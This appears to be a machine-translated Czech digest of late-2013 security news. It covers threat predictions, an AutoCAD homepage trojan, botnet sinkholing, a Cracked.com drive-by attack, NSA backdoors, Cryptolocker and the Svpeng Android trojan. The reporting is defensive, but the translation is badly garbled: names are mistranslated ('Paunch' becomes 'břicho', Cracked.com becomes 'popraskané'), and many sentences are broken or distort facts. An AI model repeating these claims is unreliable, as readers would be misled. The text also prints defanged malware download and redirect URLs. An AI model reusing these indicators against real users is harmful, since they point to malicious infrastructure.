"Odpojení tradiční obrana byla zvýšena na uměleckou formu zločinci v roce 2013," řekl Charles Renert, viceprezident pro výzkum v oblasti bezpečnosti na Websense. "V roce 2014 bude kybernetickým útokům ještě složitější a rozmanitější. Zatímco obecný objem pokročilé malware se bude snižovat, lze odhadovat, objem cílených útoků a incidentů zničení dat se zvýší. Organizace musí svou bezpečnostní hru jako útočníci nadále hledat nové způsoby, jak proniknout tradiční obrany v každé fázi životního cyklu hrozby ". Předpovědi Mezi hlavní výhody patří: . 1 Advanced malware objem se bude snižovat . - množství nových malware začíná klesat Bohužel, To je špatná zpráva pro organizace. Počítačoví zločinci se méně spoléhat na velkoobjemový pokročilé malware, protože postupem času se spustí vyšší riziko odhalení. Budou místo toho použít menší objem, více cílené útoky zajistit oporu, krást přihlašovací údaje a přesunout celé jednostranně infiltrované sítě Ačkoliv se objem útoků sníží, je riziko ještě vyšší.. 2. Hlavní dat zničení útok bude dít. - Historicky, většina útočníci použili síťovou porušení ukrást informace za účelem dosažení zisku v roce 2014, organizace musí být. obavy o národních států a počítačoví zloději používají porušení zničit dat Ransomware bude hrát roli v tomto trendu a pohybovat se na trhu pro malé a středně velké organizace.. 3. Útočníci budou mít větší zájem o cloud dat, než ve vaší síti. - Počítačoví zločinci Zaměří se jejich útoky více na data uložená v cloudu vs dat uložených na v síti. Tento taktický posun sleduje pohyb kritických obchodních dat na cloud-based řešení. Hackeři zjistíte, že proniknout do data-bohaté mrak může být jednodušší a více . výnosnější než dostat přes "hradeb" z on-premise podnikové síti . 4 Redkit, Neutrino a další exploit kity bude bojovat o moc v návaznosti na Blackhole autora zatčení - Blackhole Exploit Kit byl pravděpodobně nejúspěšnější v historii . Všechno se změnilo v říjnu 2013, kdy "Paunch," údajný hacker autor za slavnou kit, byl zatčen v Rusku. Uvidíme, boj o vedoucí pozici na trhu mezi řadou nových subjektů a stávajících Exploit sad v roce 2014. Očekáváme Redkit a exploit kit Neutrino zajistí silnou oporu v příštím roce. 5 Java zůstane vysoce využitelné a velmi využíván, s rozšířenými následky. -. Většina koncových bodů bude i nadále provozovat starší verze Javy, a proto i nadále mimořádně vystaveni vykořisťování v roce 2014 , zločinci budou věnovat více času na nové využití vyzkoušené a pravdivé útoky a tvorbě dalších aspektů pokročilých vícestupňových útoků. Útočníci si vyhrazuje zero-day Java využije k cílenému vysoce hodnotných sítí s dobrou praxí záplatování Java. 6 Útočníci. budou stále lákat vedení a kompromisní organizace prostřednictvím profesionálních sociálních sítích - Jak sociální sítě nadále apelovat na podnikatelskou sféru v roce 2014, budou útočníci stále více využívají profesionální webové stránky, jako je LinkedIn, na výzkum a přilákat vedení Tato vysoce targeted bude metoda. . slouží ke shromažďování zpravodajských informací a ohrozit sítě . 7 Zločinci se zaměří na nejslabší vazby v části "Údaje pro výměnu řetězu" - Útočníci půjde po nejslabších článků v informačním řetězci, a zaměřit se na poradce mimo sítě, kteří mají nejvíce informací to. zahrnuje poradci, dodavatelé, prodejci a jiní, kteří obvykle sdílejí citlivé informace s velkými firemních a vládních subjektů. A jak se ukázalo, některé z těchto partnerů dostatečné obrany. 8. Chyby budou v "útoku" bezpečnost díky misattribution z útoku je zdroj - Již několik let jsme slyšeli více o "ofenzivní" bezpečnosti, kde globální vlády a podniky byly hrozí odvetnými útoky proti nikomu ulovených na ně útočí, nebo svých zájmů v tradiční válce, bude taktické chyby se stále častěji v. Tyto cybertrenches. Neschopnost přesně identifikovat cyber-pachatele může vést nevinné organizace byl chycen v křížové palbě.
AutoCAD - nová platforma pro trojské koně úvodní stránku 16.11.2013 Viry
V Číně Úvodní stránka trojské koně se staly populární druh malwaru, protože změnou stránek uživatelů prohlížeče startu to ukazuje na určité navigaci webu, může majitel stránek získat velké množství webového provozu, které pak mohou být převedeny do velké sumy peníze. Za účelem rozšíření takové trojské koně v co nejširší míře, trojské autoři dokonce obrátil své zraky do AutoCADu. Tento týden jsme objevili dvě nové aplikace AutoCAD trojské koně detekované jako Trojan-Downloader.Acad.Qfas.b a Trojan.Acad.Qfas.o. Jsou psány AutoLISP smíchané s VBA, a jsou zaměřeny na změnu stránek uživatelů prohlížeče začátku a zobrazování reklamy. Podle našich statistik KSN, tato hrozba se objeví hlavně v Číně, Indii a Vietnamu.
0x00. Obecné informace o dvou trojských koní Tyto dva trojské koně jsou sestaveny AutoLISP soubory s příponou. Fas. Zde je fragment:
To může způsobit potíže při analýze, protože neexistuje decompiler jako takový pro fas souborů a tyto trojské koně se podařilo vyhnout detekci antivirovými programy kromě Kaspersky, které jsou schopny rozkladem těchto souborů.:
Níže uvedený diagram ukazuje, jak Trojans práce:
Škodlivý účinek je zahájen Trojan-Downloader.Acad.Qfas.b který stáhne Trojan.Acad.Qfas.o. Trojan.Acad.Qfas.o odpovídá za změnu prohlížeče domovskou stránku a režie prohlížeč reklamních ploch. To může fungovat na většině populárních čínských internetových prohlížečů, jako je maxthon.exe, 360se.exe, sougouexplorer.exe, atd.
0x01. Trojan-Downloader.Acad.Qfas.b Hlavním cílem tohoto Trojan je stáhnout Trojan.Acad.Qfas.o. To je obvykle distribuován v archivech obsahujících architektonických výkresů s názvem acad.fas. Když je vykonán AutoCAD, nejprve zkopíruje do shxfont.fas.
Poté se pokusí stáhnout Trojan.Acad.Qfas.o z hxxp :/ / zxb.isdun.com / jbbgxf /? F = zydz.
Nakonec se upraví tak, že stažený soubor shxfont.fas můžete spustit v budoucnu.
0x02. Trojan.Acad.Qfas.o Když je stáhnout a spustit Trojan-Downloader.Acad.Qfas.b, prochází do seznamu systémových procesů najít následující prohlížeče procesy:
Po zjištění okno prohlížeče, Trojan extrahuje URL v adresním řádku v kartě prohlížeče a zkontroluje se, zda obsahuje řetězec "hao123.com", pokud ne, bude Trojan nasměrovat prohlížeč http://www.hao123. com /? tn = 99182691_hao_pg.
Trojan také pravidelně otevírá nové prohlížeče proces navštívit hxxp :/ / ap.zeqj.info / zl.htm.
A změny prohlížeč domovskou stránku na h ** p :/ / www.hao123.com/?tn=99182691_hao_pg úpravou registru.
Chcete-li změnit úvodní stránku v prohlížeči Sougou, Trojan také modifikuje soubor% userprofile% \ AppData \ Sougouexplorer \ config.xml - konfigurační soubor Sougou.
Navíc se kontroluje, zda existují následující procesy:
Pokud se tak stane, bude to odstranit sám.
Kromě toho, na 01.1.2012, bude Trojan zobrazí okno se zprávou říci: "Šťastný Nový Rok"
0x03. Dvě adresy URL hxxp :/ / www.hao123.com/?tn=99182691_hao_pg ukazuje hao123.com hlavní stránku. "99182691_hao_pg" je ID agenta stránkách šíření hao123.com. Vzhledem k tomu, že je obvykle velmi obtížné pro čínské uživatele pamatovat adresy webových stránek, navigační stránky, jako jsou hao123.com často používá, aby se návštěvy stránek pohodlnější. Majitelé populárních míst navigace můžete vydělat obrovské množství peněz. Ve snaze, aby se jim více populární, některé navigační stránky obvykle využívají šíření látek, které v závislosti na provozu, který již přinesl, může představovat významný podíl na webu příjmu.
hxxp :/ / ap.zeqj.info / zl.htm je mnohem zajímavější - to osvěžuje prohlížeč přesměrovat ji na hxxp :/ / www.sohutv484012.kangca.com/ ...
který bude skákat na wenying888.com
Nakonec wenying888.com ukazuje inzerát v tomto duchu:
0x04 Více malware AutoCADu? Úvodní stránka Trojan se stal hlavním typem malwaru v Číně a AutoCAD viry nejsou nic nového. Ale tohle je poprvé, co jsme viděli začátek stránky trojské koně, pracující na platformě AutoCAD. Jak je stále obtížnější obejít všechny technologie ochrany antivirových produktů, malware autoři hledají nové platformy využít. Skutečnost, že AutoCAD je široce používán, jeho AutoLISP jazyk je dostatečně výkonný, a sestavovány. Fas soubory jsou těžko k analýze bez Decompiler, AutoCAD stala dobrou platformou pro šíření malware. Můžeme očekávat další typy malware se objeví na této platformě? Čas ukáže.
Sinkholing na Hlux / Kelihos botnet - co se stalo?
16.11.2013 Viry | BotNet
Již v březnu 2012 jsme se spojili s Crowdstrike, na Honeynet Project a Dell SecureWorks v zakázání druhou verzi Hlux / Kelihos-botnetu. Mysleli jsme si, že teď by byl dobrý čas na aktualizaci o tom, co se stalo s tím sinkhole-server v průběhu posledních 19 měsíců.
To, co vidíme dnes, je to, co jsme očekávali. Botnet je stále menší a menší - oběti byly dezinfekční nebo přeinstalovat své počítače v průběhu času. V současné době máme počítat asi 1000 unikátních roboty v průměru za měsíc:
Počet jedinečných roboty od března 2012 Vzhledem k botnet je peer-to-peer-design, může stále existují nezávislé podmnožiny počáteční botnet, který nikdy připojený k našemu závrtu. Ale myslíme si, že bot-počet za takové podmnožinu by se vyvíjely podobným způsobem, protože s největší pravděpodobností bot, pastevci by nechat je na pokoji, jak dobře a soustředit se na vytvoření "Hlux 3".
Většina robotů jsou stále běží pod Windows XP. Ale také jsme viděli Někteří boti běží pod Windows Server 2008:
OS (posledních 14 dní) Většina infikovaných klientů v Polsku:
Země (posledních 14 dní) Skupina, za Hlux je známo, že adept na rychle obnovují jejich nelegální infrastruktury. Protože skupina je také známo, že za botnet Waledac , myslíme si, že je nepravděpodobné, že bude poslední slyšíme o tom gangu.
V neposlední řadě, rychlý přehled o příběhu Hlux / Kelihos:
V září 2011 jsme provedli první Takedown na Hlux. Zločinci odpovědní za tento botnet neprokázalo významný podíl při přijímání protiopatření - opustili botnet svému osudu (z toho, že pod naší kontrolou, nyní) a okamžitě začal stavět nový botnet. Takže po krátké době, Hlux 2 se objevil na radaru, a my jsme to dokázali znovu - otravují P2P sítě sinkhole ji . A opět, zločinci se rychle obnovily svou botnet a Hlux 3 se narodil - do 20 minut! V březnu 2013 byli špatní konfrontován s novou odstavení provozu - zahájena a prováděna v přímém přenosu na konferenci RSA 2013 našimi přáteli na Crowdstrike.
Cracked.com Servírovací malware v drive-by ke stažení
15.11.2013 Viry
Populární humor webové stránky, popraskané [dot] com údajně hostil malware, který infikoval stroje svým návštěvníkům přes víkend a může ještě dělat tak podle Barracuda Labs výzkumu.
Malware se množily pomocí drive-by-ke stažení, a není známo, kolik systémy nakazil v důsledku návštěvě webu. Barracuda Labs tvrdí, že počet infekcí může být poměrně vysoká v úvahu, že web patří 289 v USA a 654 globálně, podle informací na webu firmy, Alexa.
Útočníci doručily exploit s nebezpečným kouskem javascriptu, že vložené do popraskané [dot] com.
Podle zprávy, javascript způsobil uživatelům odeslat požadavek k doméně "crackedCDM [dot] com." Registrační údaje pro danou doménu naznačuje, že útočníci mohli mít přístup k popraskané [dot] com již 4.listopadu.
Škodlivý doména iframe odkazující na "p68ei5 [dot] degreeexplore [dot] biz", který pak poslal koktejl škodlivých PDF, Java, HTML a JavaScript souborů do oběti prohlížeči. Pokud budou úspěšní, útočníci pak nahrál jejich škodlivého softwaru postižených strojích.
Barracuda Labs tvrdí, že infekce je nenápadný člověk, takže nakažené uživatelům bez známek kompromisu jiného než to, že Java plugin zahájila a že systém běží na nedostatek paměti.
Můžete se dozvědět více o konkrétní kus malware v provozu zde .
V době jejich Barracuda Labs publikaci, jen sedm z 46 malware motory byly detekci hrozby.
Popraskané [dot] cz neodpověděla Barracuda Labs zveřejnění zpočátku, ale později postavený na fóru, že vyřešili problém někdy v úterý. I přes to, že Barracuda Labs tvrdí, že místo je stále napaden a že podobné útoky na místě se zdá být stále se opakující problém.
Kontrolní Backdoors "přispívala k nejistotě", říká zpráva
14.11.2013 Viry
Stávající stav, ve kterém vládní agentury a zpravodajské služby pracují na zadní vrátka vložit do různých hardware, software a sítí není jen problémem z hlediska občanských práv, ale také představuje vážné bezpečnostní riziko pro většinu uživatelů a internetu samotného, nedávný Zpráva Citizen Lab říká. A mohou zjevení programů pro dozor nad USA v posledních měsících také plodit řadu napodobitele programů v rozvíjejících se zemích.
Některé z více výbušných a znepokojující odhalení, které přijdou z ustáleného toku úniků NSA v letošním roce účastní americké vlády snahu ohrozit šifrovací standardy, softwarové programy a internetové infrastruktury používají miliony a miliony lidí v rámci zpravodajských operací . Dokumenty zveřejněné v posledních měsících ukazují úsilí NSA ovlivnit standardy procesu na NIST, zejména pokud jde o Dual ES DRBG generátor náhodných čísel, který NIST varoval vývojáři přestat používat. Tam také byli obvinění, že agentura a její spojenci klepnutím nešifrované spojení mezi datovými centry ve vlastnictví Google a Yahoo, zjevení, která rozzuřila bezpečnostních inženýrů společnosti Google.
Bezpečnostní experti již dlouho tvrdí, že vkládání zadních vrátek do široce nasazen software nebo hardware pro vymáhání práva nebo zpravodajskou účely není jen otázkou, s ohledem na občanská práva, ale také poškozuje bezpečnost celého systému. Přítomnost zabezpečení v aplikaci nebo hardwarový otevře tohoto cíle až vykořisťování kýmkoliv, nejen lidé, kteří vložili backdoor. Citizen Lab Zpráva s názvem " Vypnutí Backdoor "Ron Deibert z University of Toronto, tvrdí, že NSA objevy přinesly tento problém do ostrého světla.
"Nehledě na tyto obavy o soukromí a možného zneužití nekontrolované moci je další starost kolem bezpečnostních důsledků zadní vrátka. Stavební zadní vrátka do zařízení a infrastruktury mohou být užitečné pro vymáhání práva a zpravodajskými službami, ale také poskytuje vestavěný zranitelnost pro ty, kteří by jinak zneužít, a přitom skutečně přispívá k vytváření nejistoty pro celou společnost, která závisí na že infrastruktura, "říká Deibert ve zprávě.
"V roce 2008 vědci Citizen Lab zjistila, že čínská verze oblíbeného produktu VOIP, se Skype (tzv. TOM-Skype) byl zakódován speciální monitorovací systém v místě, jako je, že když byla některá klíčová slova napsali do chatu klienta by být data odeslána na serveru v Číně (pravděpodobně sdílet s bezpečnostními službami v Číně) 0,20 při dalším zkoumání bylo zjištěno, že server, na které byly uloženy zprávy v chatu nebyl chráněn heslem, což pro stahování milionů osobních chaty, mnoho jehož součástí čísla kreditních karet, obchodní transakce a jiné soukromé informace. "
Kromě nezamýšlených důsledků těchto programů mohou vyrábět, Citizen Lab Zpráva také říká, že Edward Snowdena je odhalení metod NSA a technik by mohlo poskytnout plán pro režimy v rozvíjejících se zemích, které mají zájem vyvíjet větší kontrolu nad jejich komunikační infrastruktury.
"Není pochyb o tom, kdo důsledky odhalení Snowdena je bude urychlovat na mnoha národních snah o znovuzískání kontroly nad informačních infrastruktur prostřednictvím národních konkurentů Google, Verizon a ostatních dotčených společností, nemluvě o rozvoji národních programů inteligence signálů, které se snaží kopírovat Americký model, "Deibert píše ve zprávě.
"Už před odhalením, řada firem čelí složité a občas frustrující národní" zákonného přístupu "žádostí z nově vznikajících trhů. Mnoho zemí globálního Jihu chybí i základní ochranná opatření a mechanismy odpovědnosti kolem operací bezpečnostních služeb a jejich nároky na soukromý sektor může přispět k závažnému porušování lidských práv a dalších forem represe. "
Deibert tvrdí, že zatímco tam jsou legitimní použití Zákonný odposlech technologií, by měly být nasazeny střídmě a s velkou dohledu.
"Ty zákonného přístupu ustanovení, která jsou ještě potřebné by mělo být časté a jsou přísně kontrolovány s přísným dohledem a veřejné odpovědnosti ustanovení. Přímé snímání celého velkoobchodní služby by měly být odstraněny. Nejen, že bude chránit občanské svobody a zabránit koncentraci moci v nekontrolovaných rukou, bude zajištěno, že nejsme tím více podkopat naši vlastní bezpečnost v overzealous dozoru pátrání, "píše.
Většina návštěv na přihlašovací stránce jsou škodlivými nářadí
12.11.2013 Viry | Phishing
Incapsula průzkum 1000 webové stránky za 90denní období, kdy jsme zaznamenali více než 1,4 milionu neověřených pokusech o přístup a 20.376 ověřené přihlášení. Jejich údaje ukazují, že 2,8% z neověřených pokusy byly provedeny lidské návštěvníky. To naznačuje, že většina z nich by měla být připsána na "selhání lidského faktoru" (např. zadáním nesprávné heslo), a na počáteční jednorázové 2fa procesu aktivace.
Čísla také ukazují, že další 1,8% z neověřených návštěvy byly provedeny benevolentní roboty (např. vyhledávače, legitimní roboti, RSS čtečky, atd.), jejichž počet by byl jistě mnohem vyšší, kdyby nebylo běžnou praxí, že blokuje přihlášení . URL pomocí souboru robots.txt Zbývajících 94.1% návštěv byly zlými úmysly automatizovaných nástrojů - druhů, které se používají k objevování a využívání heslo související bezpečnostní díry. Jednoduše řečeno to znamená, že v průměru 15 každých 16 návštěvníků na vaše přihlašovací stránky mají nemocné pozornost v mysli.
Zdánlivě vysoký podíl škodlivých návštěv je ve skutečnosti, všichni ale očekává, že - zejména s ohledem na nedávné vlny rozsáhlých útoků hrubou silou a celkový nárůst APT akcí a jiných heslo souvisejících udělátek. této souvislosti je ještě patrnější z pohledu na trendů zpráv. Například, při dodržení časové ose blokovaných pokusů, je snadné rozpoznat zřetelný vztah mezi prudkým zvýšením počtu škodlivých pokusech o přístup a zprávy o napadení Fort Disco, který se vynořil celý srpen a září.
Složitost malware Android roste 11.11.2013 Viry | Mobil
259 nových mobilních hrozeb rodiny a varianty stávajících rodin byly objeveny F-Secure Labs ve třetím čtvrtletí roku 2013, podle nového mobilního hrozeb zprávy mezi červencem a zářím 2013. 252 z nich bylo pro Android a 7 Symbian. Toto číslo je nárůst z 205 rodin a variant hrozeb zjištěných ve druhém čtvrtletí.
V dalším kroku pochodu komoditizací malware Android, zprávy se vynořily v červenci sady nástrojů nové Androrat APK pojiva, která zjednodušuje proces vkládání škodlivého kódu do legitimních Android aplikací. A na znamení, že složitost malware Android se zvyšuje, jeden z pěti mobilních hrozeb jsou nyní roboty, uvádí se ve zprávě. Díky bezpečnostní opatření na místě v obchodě Google Play, méně malware hrozby se objevují tam. Místo rostoucí zájem v Google Play je u aplikací, které porušují soukromí coby overcollection dat.
"Lidé pochopili, že je něco sporné o tom dát své informace do velkých objemů dat, ale dávají hodně stejné informace na pochybných aplikací po celou dobu" říká Sean Sullivan, Bezpečnostní poradce F-Secure Labs. "Alespoň se společnostmi jako Google, tam je nějaká odpovědnost a některé zavedené postupy ochrany soukromí. Například když smažete svůj účet služby Gmail, budou mazat data. Ale s těmito malými aplikacemi, nemáte ponětí, co dělají s daty. A víte, co dělají? Jsou prodávat to marketingových sítí, "Sullivan přidán.
Malware analytici pravidelně vyšetřovat nezveřejněných narušení dat 11.11.2013 Viry
ThreatTrack Security publikoval studii , která odhaluje montáž kybernetické výzev v rámci amerických podniků. Téměř 6 do 10 malware analytiků uvedlo, že byly vyšetřeny nebo řešit narušení dat, která nebyla nikdy zveřejněny v jejich společnosti.
Tyto výsledky naznačují, že údaje porušení epidemie - celkem 621 potvrzených narušení dat v roce 2012, v závislosti na 2013 Verizon narušení dat Vyšetřování zpráva - může být výrazně podhodnocen, takže zákazníci podniků a jejich sdílení údajů partneři vědomi širokou škálu potenciální bezpečnostní rizika spojená se ztrátou osobní nebo chráněných informací. Navíc, největší společnosti, osoby s více než 500 zaměstnanci, jsou ještě více pravděpodobné, že měli nehlášeného porušení, s 66% malwaru analytiků s podniky této velikosti zpravodajské nezveřejněné narušení dat. Nezávislý průzkum slepý 200 bezpečnostních profesionálů zabývající se malware analýza v amerických podniků, bylo provedeno Stanovisko věcech jménem ThreatTrack bezpečnosti v říjnu 2013. Kromě znepokojivě vysoký počet odhalených narušení dat hlášených, studie upozorňuje na několik dalších výzev podniku kybernetické profesionálů tvář. "I když je to odrazuje, že tolik malware analytici jsou si vědomi narušení dat, které podniky nebyly zveřejněny, není divu, že k uvedenému porušování dochází, "uvedl generální ředitel Julian ThreatTrack Waits, Sr" Každý den, malware se stává složitější a americké podniky jsou neustále terčem kybernetických špionážních kampaní ze zámořských konkurentů a zahraničními vládami. Tato studie ukazuje, že malware analytici jsou plně uvědomuje hrozby, kterým čelí, a zatímco mnoho z nich podávat zprávu o pokroku v jejich schopnosti boje proti kybernetické útoky, ale také poukázat na nedostatky ve zdrojích a nástroje. " 40% respondentů uvedlo, že jedním z nejobtížnějších aspektů bránil jejich sítě organizace byla skutečnost, že nemají dostatek vysoce kvalifikovaných bezpečnostní personál na zaměstnance. Zhorší záležitosti, je jejich čas strávený často řešení se snadno vyhnout malware infekce vznikající na nejvyšších úrovních jejich organizace. Na těchto sazeb analytici malware odhalil přístroj používaný člena jejich užšího vedení se stal napaden škodlivým vlivem vedení :
Návštěva pornografické webové stránky (40%) Kliknutím na nebezpečný odkaz v e-mailu phishing (56%) Povolení rodinný příslušník použít ve vlastní zařízení (45%) Instalace škodlivý mobilní aplikace (33%). Když žádal, aby poznal z nejobtížnějších aspektů při zajišťování ochrany sítě svých firem v pokročilém malware, 67% uvedlo, že složitost malware je hlavním faktorem, 67% uvedlo, že objem útoky škodlivého softwaru, a 58% uvedlo neúčinnost anti-malware řešení , které kladou důraz na zásadní význam mnohovrstevná, pokročilé počítačové obrany. Více než polovina (52%) všech malware analytiků uvedla, že obvykle trvá jim déle než 2 hodiny analyzovat nový malware vzorek. Naopak, pouze 4% uvedlo, že jsou schopny analyzovat nový malware vzorek za méně než hodinu. Není divu, že 35% uvedlo, že jedním z nejobtížnějších aspektů bránit svou organizaci v pokročilém malware je nedostatečný přístup k automatizované řešení malware analýzy, který odpojí analýzy časy během několika minut.
Cryptolocker přepětí přímo svázané s Blackhole pádu
11.11.2013 Šifrování | Viry
Nedávný nástup Cryptolocker jako jeden z nejrozšířenějších, viditelné a smrtící hrozby je přímo vázána k zatčení "břicho", tvůrce nechvalně Blackhole Exploit výstroje a cool. Jak se dalo předpokládat, od jeho zatčení na začátku října, dva Sady - z nichž Blackhole byl nejpoužívanější jeden - zastavit přijímání aktualizací a exploity, které ovládal dostal zatuchlá, což kity mnohem méně účinné nástroje, než předtím. Cyber podvodníci, jejichž cílem je pokračovat v distribuci malwaru museli najít novou cestu, a to Ukázalo se, že Upatre downloader Trojan. "Zjistili jsme, že botnet Cutwail zodpovědný za hlavní Blackhole Exploit Kit spamu běží začal posílat ven vede účetní Upatre (což v konečném důsledku vede k CryptoLocker) zhruba v říjnu stejný měsíc břichem zatčení "Trend Micro vědci sdílené . "Ve skutečnosti jsme se sledovat více IP adresy spojené s přechodem - zasílání Blackhole Exploit Kit spam krátce před zatčením a odesílání spamu CryptoLocker po zatčení." Upatre downloader je obvykle dodáván jako malware přílohy v nevyžádaných e-mailů. Má jen jeden cíl, a dělá to dobře: to stáhne a spustí soubor z webového serveru ohrožena, a pak skončí. Kdysi se, že by stažení hlavně Zeus varianty, ale teď Cryptolocker se obvykle dodává místo. "Cutwail botnet má schopnost vyslat velmi vysokého počtu spamových zpráv, což vysvětluje vysoký výskyt této nedávné spinu v ransomware" Vědci poukázal. "Zdůrazňuje také, poněkud zvráceně, jak odolné počítačová kriminalita může být: odpověď na břicho odchodu byla pozoruhodně rychlá a může skončit až ovlivňuje více lidí, než oni měli předtím."
Malware trhovců testování nových technik infekce 8.11.2013 Viry
Probíhající škodlivé spam UPS vydává za kampaň ukázala, že malware trhovců experimentují s různými přístupy k infikování nešťastné uživatele a další nedávné spam kampaně ukázaly, že jeden z nich je efektivní zejména:. Vložení škodlivého kódu do RTF nebo DOC soubory První kampaň, analyzovány malwaru výzkumník Blaze Bart , začíná s falešným o doručení UPS, který nese i soubor DOC (údajně faktury), a odkaz na faktuře. E-mailová adresa je falešné, aby to vypadalo, jako je zpráva pochází z legitimního UPS e-mailovou adresu. Připojený soubor a ten, stáhnout pomocí odkazu jsou stejné: falešný DOC soubor, který je vlastně soubor RTF obsahující exploit . Pomocí OfficeMalScanner je RTFScan nástroj, Blaze zjistil, že soubor nese zranitelné OLE dokument, který využívá MS Office zranitelnosti k instalaci škodlivého kódu počítače oběti. Další vzorek dostal udělal totéž, ale využívány další Office chybu. Neměl podaří zjistit, co je malware spadl na zem, ale spekuluje, že je pravděpodobné, že Bitcoin mining Trojan Zeus nebo informace-krást jeden. Ve velmi podobnou kampaň spatřen Kaspersky Lab vědci, je stejný postup použít: údajně legitimní e-mail nesoucí "potvrzení" ve formě souboru ve formátu RTF nese v sobě CPL soubor, který je ve skutečnosti bankovnictví Trojan napsaný v Delphi:
"Vložení škodlivé soubory do formátu RTF nebo DOC soubory umožňuje zločinci obejít filtrování e-mailů pomocí seznamu přípon nebo druhu, také jim umožňuje překonat AV detekci signatur," vědci vysvětlují tím, že jsou jisti, že si tato technika je sam masivně využívána v budoucnosti. Co se dá udělat pro ochranu sebe sama z toho? Obvykle: aby se vaše Windows a Office aktualizován (použité exploity jsou většinou staré a již záplatované) a používat bezpečnostní software. Více technicky zdatní uživatelé mohou také zlepšit zabezpečení souborů Office zakázáním ActiveX, makra a blokování externího obsahu, a síťoví administrátoři mohou blokovat IP adresy vázané na škodlivých kampaní. "I když spammery a autory malwaru se snažili techniku přikládání škodlivého souboru nebo odeslání odkaz v e-mailu, neviděl jsem jim to, že jak moc, "říká Blaze. "Pomocí těchto využije, to je jasné, že jsou důkazem, testování jejich možnosti. Kolik padli nebo padne pro tuto kampaň? Kolik z těchto maily byly rozeslány vlastně je? Neexistuje žádný jistý způsob, jak zjistit. "
Svpeng Android bankovnictví Trojan jde phishing
8.11.2013 Viry | Phishing
Bankovní Android Trojan známý jako Svpeng byla zlepšena jeho tvůrci a nyní je schopen provádět phishingové útoky, stejně jako krást peníze přímo od oběti bankovní účet prováděním příkazů ze vzdáleného C & C. Je to latter zasláním SMS na čísla dvou ruských bank, kontrola tímto způsobem, pokud tento konkrétní telefon má kartu vázána na to. Pokud je odpověď ano, malware pokračuje zaslat tuto informaci do C & C, od které obdrží příkazy k převodu peněz z oběti účtu na jeden ovládanými útočníků. Svpeng je v současné době pouze z zaměřit ruské uživatele, i když rozšíření potenciální oběti bazén je pravděpodobné, protože má schopnost rozpoznat zařízení operační systém nastavení jazyka. To se šíří pomocí falešných SMS zpráv. Tato nejnovější změna je malware zjistit, kdy uživatel spustí bankovní aplikaci na konkrétní (a jeden z největších) ruských bank, a nahradit otevřené okno s falešnou ten, který je naprogramován k odeslání zadat přihlašovací údaje k podvodníci stojí za tohoto režimu. Kromě toho, malware dělá to samé, když uživatel spustí Google Play, a to ukazuje falešné okno, ve kterém je uživatel vyzván k zadání svého údaje o kreditní kartě. Opět jsou data posílána na podvodníky.
. Svpeng také má dobrý ochranný mechanismus proti mobilních AV řešení "Aby se zabránilo bezpečnostní produkty z jeho smazání Trojan stále používá standardní Android nástroj - deviceAdmin," vysvětluje expert společnosti Kaspersky Lab Roman Unuchek. "Chcete-li zabránit uživatelům zakázat DeviceAdmin, Trojan využívá dosud neznámou chybu zabezpečení v systému Android. Stejným způsobem se snaží, aby se zabránilo resetování telefonu do továrního nastavení.
Počítačoví zločinci se rozhodly pro real-time malware a phishing kampaně
8.11.2013 Kriminalita | Viry | Phishing
Ve třetím čtvrtletí roku 2013 došlo k dalšímu využití real-time malware kampaní a dramatickému nárůstu phishingových stránek, v závislosti na Commtouch.
Stále větší využívání současných zpravodajských událostí pokračoval ve 3. čtvrtletí. Doba mezi skutečné události a související malware útoku neustále klesá v průběhu celého roku a nyní průměry jen 22 hodin. Real-time malware kampaně ve 3. čtvrtletí použité zprávy o královské dítě Prince George, NSA informátor Edward Snowden a krize Sýrie. počet phishingových stránek dramaticky zvýšila během 3. čtvrtletí o téměř 35%. PayPal phishingové stránky samy o sobě představovaly zhruba 750 nových phishingových stránek každý den. malý pokles o 5% by mohl být viděn v počtu škodlivých webových stránek uvedených v URL Commtouch v GlobalView databáze. Cestovní webové stránky byly nejpopulárnější internetové stránky kategorie pro malware distributorů, následuje dopravní a obchodní webové stránky. Vzdělávání, který byl číslo jedna ve 2. čtvrtletí klesl na číslo šest. "Q3 zdůrazňuje Trend Report, že složitost cybercriminal útoků se zvyšuje," říká Lior Kohavi, CTO Commtouch. "Jejich kampaně se obvykle zaměřují koncovým uživatelům - k ochraně uživatelé, poskytovatelé internetových služeb, e-mail hosters a poskytovatelé obsahu musí být vědoma těchto trendů, a neustále zlepšovat své nástroje pro boj s těmito zločinci." Ve třetím čtvrtletí roku 2013, spam hladiny i nadále klesat. Průměrná denní množství spamu v tomto čtvrtletí 69000000000 zprávy ve srovnání s druhým čtvrtletí 83000000000 - pokles o přibližně 17%. I když čtvrtletní úroveň je nejnižší za více než čtyři roky, průměrná měsíčně se zvyšuje od historické minimum červnových o 63 miliard zpráv denně až do poklesu v září. V průběhu 3. čtvrtletí, spam představoval 70% všech e-mailů odeslaných na celém světě, mohou klesat i pod 62%, na začátku srpna. nejoblíbenější spamu tématem byla dieta s podílem 40,2% (ve 2. čtvrtletí se umístil tři, přičemž 10,8%) . Stock spam přesunul ze 7. pozice (4,7%), ve 2. čtvrtletí na druhé pozici (20%) -. Tzv. penny zásob spam mohl být viděn pravidelně v posledním čtvrtletí průměrné denní množství malwaru naleznete v e-mailu zůstala téměř beze změny oproti minulému čtvrtletí na téměř 2 miliardy e-mailů denně. Tato průměrná skryje stálý nárůst od července do září, která zahrnovala výskytu dvojnásobek denního průměru. Indie zůstává největším světovým zombie hospoda: V průběhu třetího čtvrtletí roku 2013, Indie zůstala na prvním místě s nejvyšším počtem spam-botů odesílání - i když jejich podíl poklesl o 6% na 13,2%. Rusko se zdá absorbovat většinu této procenta a pohyboval od 8. místa do druhého. Nové položky jsou Ukrajina, Saúdská Arábie a Španělska, zatímco Spojené státy, Srbsko, Mexiko a vypadl z top 15.
Nová hrozba: Sinkholing ZeroAccess - Service Alert
8.11.2013 Viry
POZADÍ :
V pondělí 30.září 2013, byl článek zveřejněn na blogu Symantec Security Response společnosti Symantec podrobně úsilí na sinkholing 500000 z botů, které patří do ZeroAccess botnet. Jak srpna 2013 botnet je jedním z největších v existenci dnes s populací v nahoru o 1,9 milionu počítačů. ZeroAccess používá peer-to-peer (P2P) jako jeho velení a řízení (C & C) komunikační mechanismus.
V březnu tohoto roku, Symantec bezpečnostních inženýrů začal studovat mechanismy používané ZeroAccess roboty komunikovat spolu navzájem ve snaze zjistit, zda by mohly být sinkholed. 29. června, pozorovali novou verzi ZeroAccess je distribuován přes P2P sítě. Aktualizovaná verze se zabývala konstrukční chybu, která dělala botnet ohroženy jsou sinkholed. Nicméně, Symantec byl ještě úspěšný v sinkholing velkou část botnetu.
